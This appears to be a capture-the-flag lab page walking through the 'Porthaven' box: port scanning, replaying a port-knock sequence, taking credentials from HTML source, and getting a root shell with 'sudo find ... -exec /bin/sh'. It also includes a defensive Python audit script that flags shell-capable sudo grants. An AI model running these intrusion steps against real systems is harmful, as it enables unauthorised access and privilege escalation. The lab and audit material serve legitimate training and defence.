πŸ€ 0 pts earned

Porthaven

A forgotten web server hides its admin panel behind a port-knocking sequence left in a public config file. Find the knock, open the gate, grab the cleartext credentials the sysadmin left in the page source, and follow one GTFOBin straight to root.


Walkthrough

Objective

Discover a port-knocking sequence from an exposed configuration file, unlock a hidden service, and escalate to root via sudo find.

Phase 1: Recon & Knock Discovery

  1. Scan all TCP ports: nmap -p- TARGET
  2. Enumerate HTTP: find a /configs/ directory listing.
  3. Download the exposed config file and extract the three-port knock sequence.
  4. Replay the sequence: knock TARGET PORT1 PORT2 PORT3
  5. Rescan: a previously closed SSH port is now open.

Phase 2: Credential Extraction

  1. Browse the newly unlocked HTTP admin path.
  2. View source: credentials embedded in an HTML comment.
  3. SSH as the discovered user, capture user flag.

Phase 3: Root Escalation

  1. sudo -l shows (ALL) NOPASSWD: /usr/bin/find
  2. sudo find . -exec /bin/sh \; -quit → root shell.
  3. Capture root flag.
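
From the defender's side, the sudo rule in Phase 3 is something an audit can catch before anyone else does. The script below is an added example, not part of the original walkthrough: it parses `sudo -l` output and reports grants of binaries that can run arbitrary commands. The binary list is a partial, constructed subset, and the sample user and host names are made up.

```python
import re
from pathlib import PurePosixPath

# Constructed, partial set of binaries that can run arbitrary commands when
# allowed through sudo (find does it via -exec). Extend from GTFOBins.
SHELL_CAPABLE = {"find", "vim", "less", "awk", "env", "tar", "perl", "python3"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")  # "(runas) cmds"
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")                         # "NOPASSWD: "


def audit_sudo_l(text):
    """Return (runas, command_path, nopasswd) for each risky grant."""
    findings = []
    for line in text.splitlines():
        rule = RULE.match(line)
        if not rule:
            continue  # headers, "Matching Defaults" lines, blanks
        nopasswd = False
        for item in rule.group("rest").split(","):
            item = item.strip()
            tags = TAGS.match(item)
            if tags:  # a tag applies to this command and the ones after it
                names = tags.group(0).replace(":", " ").split()
                if "NOPASSWD" in names:
                    nopasswd = True
                elif "PASSWD" in names:
                    nopasswd = False
                item = item[tags.end():]
            if not item:
                continue
            path = item.split()[0]
            if path == "ALL" or PurePosixPath(path).name in SHELL_CAPABLE:
                findings.append((rule.group("runas").strip(), path, nopasswd))
    return findings


# Constructed sample of `sudo -l` output; user and host names are made up.
SAMPLE = """\
User webadmin may run the following commands on porthaven:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl restart nginx, /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for runas, path, nopasswd in audit_sudo_l(SAMPLE):
        auth = "no password" if nopasswd else "password required"
        print(f"risky sudo grant: {path} as {runas} ({auth})")
```

Restricting the arguments of a listed binary does not make it safe: the less rule in the sample is still reported because its shell escape works regardless of which file is opened.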

Tips

  • knock package: apt install knockd
  • Port numbers may be UDP: try knock -u TARGET P1 P2 P3

Tips and Tricks

Tips

  • Try both TCP and UDP for the knock sequence.
  • View source on every page. HTML comments are the most common quick win.
  • sudo find . -exec /bin/sh \; -quit gives an instant root shell.
